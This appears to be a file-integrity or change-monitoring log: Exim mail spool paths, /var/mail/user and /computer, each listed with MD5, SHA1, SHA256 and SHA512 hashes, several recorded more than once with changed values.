SHA256 54de29b1a621cf5ad6f095c195f63cbe52ae93b0d3a70c312fb9f46109928a1c
SHA512 0c5d0c1af6744a0bddf0e1025d8a7875be8e34a11d835b13c201bdb9d96eabee52d75f72edf1898f1f8496c415f4e5114b154d660f14302189d2ef7b8ce894e8

/var/spool/exim4/msglog/1t2jGY-0000Cu-6i

MD5 94d397573f1307dddfcf6a062e130df0
SHA1 194604a0d71a0f4b935ef7c9e8c11a43c389890c
SHA256 f8b31747bedf0dbb653e49f05184f0513f1c59a2f58a15c17679e4795246b317
SHA512 64dd3308be0b589e59cc6f877fff4fbd39b120edc37c4d741ace91504233f10073696cc7c3fb4358580c7dda6be71c9e50ef55c53ad818bf521b5bf23a53f631

/var/spool/exim4/input/hdr.794

MD5 e35923736aeedb6dd1790a73b26620c3
SHA1 947b3528c4e7d973e3430d855e642a03eecfd23f
SHA256 587fadc3870871a666932ae9c27b9de030e3685d1565e5df5937e5387b3f66c6
SHA512 69d589ab0a0084642012fed89a057a5bdd6642be74a74484c3b29d974a84093158f4e3adcfe3b20eb0b244613b4e86eaa0519bc0ffeeb0ba51e88d5d2434c890

/var/spool/exim4/input/1t2jGZ-0000Cw-2A-D

MD5 e44ff39d35e21b5393bb08702148b252
SHA1 96f1be59719806a05abcd3891396aba19151fcbf
SHA256 71674448822a94d9e21c1666003209d2a3c8c43c3e1e09e5fbf6aa3f098c5003
SHA512 b6efadfc21ec6c8fce3c1473fb70b62559c9cbf336769b2e511aaf85176cd45a4c8890872926953ddcb63a928bfae6eab97809cdd70ad8ed316fd5e79a253da3

/var/spool/exim4/input/hdr.802

MD5 78a57d0a5cf2334f0f730d111cf010bc
SHA1 aae1760d00a507359430d5e5a6bd01acfc59b4fd
SHA256 3af3e7655ff5cd6a740ce30112101d1a4bf515d258c4bc923fb4d56a480aa424
SHA512 c35306f27da6948b41a783e58a73bdd9a233218757d7e17aa746f4d1d1719300de7070cea9c799f0c6eb3052a75ce245492e5e1513b8558cf0c05707679bb024

/var/spool/exim4/msglog/1t2jGZ-0000Cw-2A

MD5 dc079c0d5b78068d31cbd9ee06fbbe84
SHA1 935c75bf977913a589ec209e775596f714017236
SHA256 090baf6e0e03297d6c79a91c09e0f7535736b80506aa8449bc3dc117d25e6afd
SHA512 44bc24cdc3d55b6453d15b65d46082344ab3407048f622b90d90ecf9d2649e642f9c233dfc5c4e6bc3248d63c837141d14313bd60b6ff678d8563e9fe340c295

/var/mail/user

MD5 e4af9496641190839f0cd01bc84c4007
SHA1 feced251b14463ca75f1eb70f44c3248c0964fd1
SHA256 9e4a2ed4fa8e4430feeaae2267f73f0aa0a8a0eb1602edf70991087e3637aeac
SHA512 c90a0d3227a585dc1ed76557c1936bd85ac18e96c293ef03528a12a24c527e9706cf4c4bdab52acb87736eb1caa1ca5fb2e8297cf1329cb06833b5023f65cdcb

/var/spool/exim4/input/1t2jGY-0000Cu-6i-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t2jGY-0000Cu-6i

MD5 bce7909f365e543f61c721ddeacac59c
SHA1 80d3d4f213976fbb00649705295b2a0004a0fbc5
SHA256 874e42e977c2d48c1172f004cec8506dac8f43470b59c7d03c26f39a871145dc
SHA512 b124b8854da5e97965fc8560fd4b22f8e121e7828687528e78c58a4f183cfa23f801d9619c60ee6815d6f8b71feaa371f4b396d17b64cace32fde8042c46ff3f

/var/spool/exim4/msglog/1t2jGZ-0000Cw-2A

MD5 3f32d3479f4ec8908144e0670c6f06c9
SHA1 daa2e10f937c752d66c7666e7ca7005ad2e9fc95
SHA256 22b62e5948011cc6d128247b36653e9c6ccdb149605bc5bc04c5217cd54b0d18
SHA512 35b9f1b67d21dbb1ae6e44b9108648f40633224e37421730ebeded63f916b2452cef5e3710d827948c35e02c7398b2e373fb854afefa0e84b18e7913edb8d9b5

/var/spool/exim4/input/1t2jGb-0000DD-Ma-D

MD5 3692b76f749ad170d508e41af8290047
SHA1 ae2ae6e9ba33136495df99e748e349a2184240cf
SHA256 ebda15a3b4f1a230e32b403e511afea77302d653b14816ab8024d7c52a380aa3
SHA512 fd8f59e19e1c308ddcaad9e5181c4894b420b7fae79ef41d26ac568d9cb4897a6fb26ea79ba184381ea2ee6b6e4f4cf6126c7d4419f76e80a0488ccce75a9272

/var/spool/exim4/input/hdr.819

MD5 e5997f5ecd583cc4137a38f6090f3349
SHA1 1721475a98301db37fb75d72611bc74272b93e7d
SHA256 2a078ca5ed366fc5ec12c4acd0de4737d45a90e5e9334a7e2a70814dbf573121
SHA512 4d7259cae228a57468e47146dc3a03faa233466f0233d77eae74ac9b65ff73b26704db860fcc06011e8830de3a935754ecf47af914c1a2e0cc254601af67763e

/var/spool/exim4/msglog/1t2jGb-0000DD-Ma

MD5 405a7a33311635c749051cfca01a2a40
SHA1 b3fb2643469803b3b7416819049721e99a8c0963
SHA256 92901a7c0ae8b3f273c1d2b8309b1b5e1eb167e903e3fbb41a7e14d70594633c
SHA512 bacd2c6dbea8c0080b46e390f8ffc0160d04a6d9641c639a582719b2bbee3c4c0a3468597776d2ee8f41d7e7705692e71784485e1d07ad90ed3f3a77f58eadfe

/var/spool/exim4/input/hdr.809

MD5 be480db2bbee60558226264890964e9f
SHA1 9fbc5a9fd3b4906655ee2232b4e96bff4fdd3b91
SHA256 d4af9d26a8706212e8af15e6a39933c287fa6046708f53638193e84704328ebf
SHA512 9bec0f72e426ab8c53f6a4b6789b76def43380d0c3a1fd437d382732ea8bde50ab09ff375a47a78d09f30399333ed096fbd87a971ee5a922aa6217987516be80

/var/mail/user

MD5 3ab6dcd3528a237f1429cf1f2256bfeb
SHA1 0c66e76331c02f5391b8851bd3abae458a8b209d
SHA256 049ba802c7755ccdebe4a90a8f7e4d2c61f8e6810549f3511aeb0461c2e6f6e4
SHA512 dc70ca9b7eae84cbe54c73a18cb3025133373754d501b54fe930aae657b8b5b4d3b4e487cfe2da3d5e9fc23d7b982e3735b1b16a991c200c1aaa5ce006fc29bd

/var/spool/exim4/msglog/1t2jGb-0000DD-Ma

MD5 9003cec07ddf08e7f3b2eeb7c8723fd7
SHA1 0687fdd80d73b72feec9d8fd855053a76fc66b25
SHA256 248c44f941c2c180eaaebed96b571bc642c61913fb5717e181e56db37fd4f19c
SHA512 d908bd7784170c427850e7574694648365f87f0aa9f8c6deed5589a575e221e5380d55cdd6ec63e4e4de856d350f49b60c99b01003877ae5f943cda00d279574

/computer

MD5 c14e1ec4730b7dbc13aab2c312fc6411
SHA1 490d446d3c80c365cba0fc02755cc6a5877d6a33
SHA256 672197eee87423f7d44f94cb2626dbcacfb32c1d70b1c971d80c2637d63e4b9f
SHA512 5e84a965fa88811a437de09018e3a7aea0c2a0f6cd21d26dd28723d146db75aed8eb50be60cbc086652a346872e31e80d033ea957f2f5365008f57a81472398d

/computer

MD5 0a2eecdfef59995d5f79f70197c020c1
SHA1 8ba05de31af9c34726c7e31c013d5018e74e4cac
SHA256 ec48d300d5c5a5b7aed7a9b5603756fb462961a3765f74aca798bbe60a62b0b4
SHA512 832c2f02b150e8e7018ad86cb5aa5c1b07d3ac55080f7fc5328201ebcadc5b35b56b8a8d029e5d4d62ed5dcc8a7b3780918236a4c3e9b2d6816c9f1238250580

/computer

MD5 774e9a89f47b593e38f6aefb19de0531
SHA1 58207145a0c0b350d6d26c80e83988a25adaa604
SHA256 a02170e26fab3acb6c05fcd12b68b782cbceb73fa46f8b52b8aef0e5c52a5ecb
SHA512 db871ab66cb739ac1d5df29078c9b680b8f82716a71d0dbbf8bfd6b15fae195a2fdd7d34193b94da821a6135da256fb1bf041c8d3b5aa303e845ee5582a33a8f

/var/spool/exim4/input/1t2jGl-0000EQ-61-D

MD5 61a6c28ffceafb1521f04aa6656a0b2f
SHA1 d3089b0f11bb485282333a9e1c5d18da13a824e6
SHA256 31689ae4953512bd7070f36c2e3868ca9f8f62227d84449b64921f825cc906a2
SHA512 24c77f15d14b4b86bff2e4aae0f329fb9749ed78c98db1e2c603a5438b4f0f9e88293524ffa01d1e3e30941ad0db71fcabb178fa70a727a73d668e595a861769

/var/spool/exim4/input/hdr.894

MD5 f85b70ba3b3b14c636a52269bb524933
SHA1 b047efd7267a1d992c1fb64b6be3c35de922ec64
SHA256 24a3b9ec4db3dcfc880c14d1369e51e08ade9c7823a90cabc7974b3752dd40b6
SHA512 8c7a55a3fb5a5581a56b33f1a8365fa1d376751c40fa35a0968a81832cefb684dc390e4cee0886090881523676dc2c961abe0a4024faafe923ea8b1f42c3b883

/var/spool/exim4/msglog/1t2jGl-0000EQ-61

MD5 687ea130dcb9c438bec9a1c28bce9509
SHA1 bd8db3c1c512a74b3a0534246d579a6d7c437360
SHA256 913efafe2c62333d76f115463a1f8ba0851fb951b9f8a0c8cc7ac517f3cb3c23
SHA512 38077cc120df07854191be563c40b96855bca410d66e2f695716510e7177f42ae3bc51f52e58ee3e9b234f83bf0b7dc274a2ed1fc5e468049df7763e13d5a842

/var/spool/exim4/msglog/1t2jGl-0000EQ-61

MD5 3059fca7adadf1b1bead897f910d17fa
SHA1 f283d55eb6e75890698e84bbd52ebb797006961b
SHA256 8c9a8b9118275464815748d94529332806dc82602c68aa4793af20f00c4bdd62
SHA512 1ccd44a2d529970f0b2665d35e00e4e008c8747d6e2d63a330b2d8cfc8582d671c049f71c3b140065e2fd0cfe695c60ff75497a96ec9f6a505e90e1afdd3d447

/var/spool/exim4/input/1t2jGn-0000EW-Cv-D

MD5 62a996c26a20fbc112a0c928e29adb5d
SHA1 a26c80a80f989964c0fd26f4f39b0ada35e6923d
SHA256 0bfbf71f1a3a6c5b59de9241d9e1b400ba589da937dcdb297f02ba45ad336e1e
SHA512 3a5ec144f81b41680a441183f7c9254304b72b0dbdb6767dac3839153531476b0453cad1eb950e00d2f7d50af4e64dcd81bf26c4874a6e1f64fbfe7b305ea60b

/var/spool/exim4/input/hdr.900

MD5 fddd44ac80894e39a9bafa2598058cdf
SHA1 81800f07fecedd723556de72c6c708412219f969
SHA256 e361390985eb68c3e8d5ee11e7e81a893eea7582446a99f6cac3d4c055b8a1b8
SHA512 b4d08ebf1880b510c0326f580a0a2f3916751d4a9bb570856bda4f5f1afca8feaf5108dcca6a21174b8abc27864d4015be7a1419a2f47bbb37177e8d0d0ec8ba

/var/spool/exim4/msglog/1t2jGn-0000EW-Cv

MD5 937ed0c335b78ad6883bf72eaa027fa3
SHA1 8373866ae69594f197820f30f9d24ee117a3968d
SHA256 5a9f26bbd1c3782e97fb8eb657efac47ef674f605fbf9a5f77a211851bbf7e79
SHA512 1778b6bb85bbbf9077b974db9b54b0332ba42672c40d687af8326c27653931106a724d59ad05b56e0232656f31b6d6e138972246f1e287a2be7f8e05df7442b6

/var/spool/exim4/input/hdr.895

MD5 86715e1724e0e49e3ed3c9449bb3b35b
SHA1 34f160d2905340d8ebd1e2d6d4eb2b680dd63633
SHA256 941c259716bf59ef5b02127b89fb1947b3b074ea681babecb6be702cbe1f4bd1
SHA512 78a9214e116c9e99280e91f0d036da60607cad3533ec6d9254bd643d815d1add92ca5bbe6c29f6ca18b0ce631da5e57cc587040fc0e8d4cce7270ec09da5d266

/var/spool/exim4/input/1t2jGn-0000EZ-P2-D

MD5 64c032b3d2f4a344e9e1d60c6f8dbec7
SHA1 016fc6677a01b6d6d43e3a7845d76e629162bd2c
SHA256 ddaefb367848ca3ef99ab0d939e8ae0ad872bfac6c237cd9fb90f40bced476c7
SHA512 097f6ed81bc268d30d4d752c31875e303853c6e1019931c7c8ad725d49c614b02c73081ae0321597ec0d14bea4099273b1dc12d5d5f7726b4ef568d8f93f62e1

/var/spool/exim4/input/hdr.903

MD5 8331b7c8fc846f907dd14382e55abaaa
SHA1 42ec705a65ad4c553565e806cd7d0c7d21fe1b0c
SHA256 cc816ef741922795f8c2bf416ea83fd82c55e2e876cf69cc57822e72ae505fbc
SHA512 3ca20281077bc8acaf3337fd591bfc44ee2453697f5bb2095d04804fe52ad7acda491b5857df453ed84f658e795090e4a8888bdaa07da5582b20c36caec07747

/var/spool/exim4/msglog/1t2jGn-0000EZ-P2

MD5 dd135bd5214ba3aded772be7907f91d9
SHA1 5276652c2a6896629c0145922f211c12c8873ca1
SHA256 23bd03eec8ff13dc908acc0ecff042fe65e6fa12c05daf07beaddd0f398c7447
SHA512 cb9944d4085f093705906f46e40038d4111e52f85f0acced0fe0f3b17c97ab377dc3c4f25a83ed1f895bc78f9fa396bf69af404c848e44f29f6fefc66e0f74ca

/var/mail/user

MD5 19c7ce376426438a5cb219c3374c7777
SHA1 bb88199d0eb0f0582ed61f6b572e44e11cfed218
SHA256 a337dec62273933ebe9dbaf31480143128489b26948a77ba401be43e78c561f2
SHA512 9e66ee3081c5f012e053930e73772c6310679ef1305f554ef587ac290e0329bbff573101f9803dc5a7f89792a080edf30aba5612480db4e9f30362c80edd376f

/var/spool/exim4/msglog/1t2jGn-0000EW-Cv

MD5 6a04bc75839893258b247d000952a746
SHA1 0f418187636f0d9fa8957b467ef92641e857c472
SHA256 08c22bdefa06bd9b47a957b1f25b461b17179458a85c084d228469e895ddaedb
SHA512 332d431bc6fc5a1d66c763b675724d2dd3be2d600af0961572495e197208b81447c72dbdcb4d1d2060a7a0389c53cfa2788436f4b3b33367f117edb3f81d38b0

/var/spool/exim4/msglog/1t2jGn-0000EZ-P2

MD5 952d1f284d33e990fad874c9025e880c
SHA1 5ee48456a14d3652ffd1ba89c9b915ba584426de
SHA256 1da3e02dd29b58b542c902a356df24aeddea417ac3816fb833fd0b105f81fc24
SHA512 03c9742f5bbd0a9eb13a97ef6c6f707aa9c54e26929f5f1e3a130f3542528c2b1714367f0c41cfa0d60625ce98db0bacee4c78c6302521218382ed5dd5cbf90c

/var/spool/exim4/input/1t2jGp-0000En-Qq-D

MD5 bd67f759017201243930bbbc11483309
SHA1 babf7a8fa57b13cd92c472a696ea95ba0a42b50c
SHA256 22e4d3f96cdac9c1ad42309c79a75b6e2295c3c75763e81290170470cdcb4ca8
SHA512 c52d91f687072ca98b1e7e43be29a5ad2bcb49d2b01c22aae62f9ac02ca887d815f19750d224ab4c9b05daf953f15284280f3c8201664a1684bd526fa7cecdc6

/var/spool/exim4/input/hdr.917

MD5 fa74ef3d92cdb6b9517667787e85db89
SHA1 45b4da47af6b889661faca5f03e534dd05382cdf
SHA256 c627b1dc1cd21b4c0621e1989596e1bd3dcff5f1019e0ed00468d368213f2161
SHA512 76dda9c443233cf3b402b423e9f9b139a8b66cf7ecbe2708b4fc9e60f4b6f05004659c045628ab05c21fe2bed289163a81801a816cd2fe864c653b09e1c1afdf

/var/spool/exim4/msglog/1t2jGp-0000En-Qq

MD5 f3460018edc893d6432dc224cd94a36b
SHA1 98deaccbab82d8bb2885739fb0628acb5304cfad
SHA256 04b54dde75b3e111d5be2637a0c350832857fbece06a177ad04e67ad78e8047a
SHA512 80bc0a8ec6db9575e09cd25a0c2b6cec3565c084f596d6facfaf1c8167c01d2095a08d4b89f78f284c4d2d365e3ebbbb0e257e2940ac27ed4d0092e98ee0871b

/var/spool/exim4/input/hdr.909

MD5 915da82d117a7dd46386df3b01f54a6f
SHA1 77588e83ac0986c5473aa8732b4b6362d29f1033
SHA256 8b107a65a26cfd7ed6315882a40b2872c4b5d5b58b8de676778abeae73a3d29a
SHA512 98a3b968ec1433df097b2dc7a63a8e2044649c801bb83500c399b09f66803699dd277acd83c3c1b46438e072a30579346d7f5da6db891ad63c5ff3de98b3f6e0

/var/mail/user

MD5 784cfa29123c38761019515823197d1a
SHA1 43f624e89eeed093a1d1eaddaea5bd3d4ca37553
SHA256 a3b9f63630e868b5c70fb2ab6655c13074f60d421cd7e221ea3f5a0ea6624613
SHA512 393350983b8c3c308dc46c3ab228ef9245ab99eea4eb1412ce1a71e99e8d2f2a5ff46631dc96104a3f95b762abd6aeb76235a5441fadb68ba17b843d3465a76b

/var/spool/exim4/msglog/1t2jGp-0000En-Qq

MD5 23b9d284fbb7a737183134b7b451d9ef
SHA1 1a8a0d2a1824920327706ea6bdd228ef4ff3b96c
SHA256 7cc9fbd942fbccc5134cf55ad6df7e73090caee82e62682b08d70ea84cb74146
SHA512 32c835cef889e225bc9e0e8cefd6f4b8bd5181064d4a36901cf66fe65fb8fbfbbeff224967f751cf876ea69088e86a26bf1ab5f74c8335dafb1e4d58c1f9f158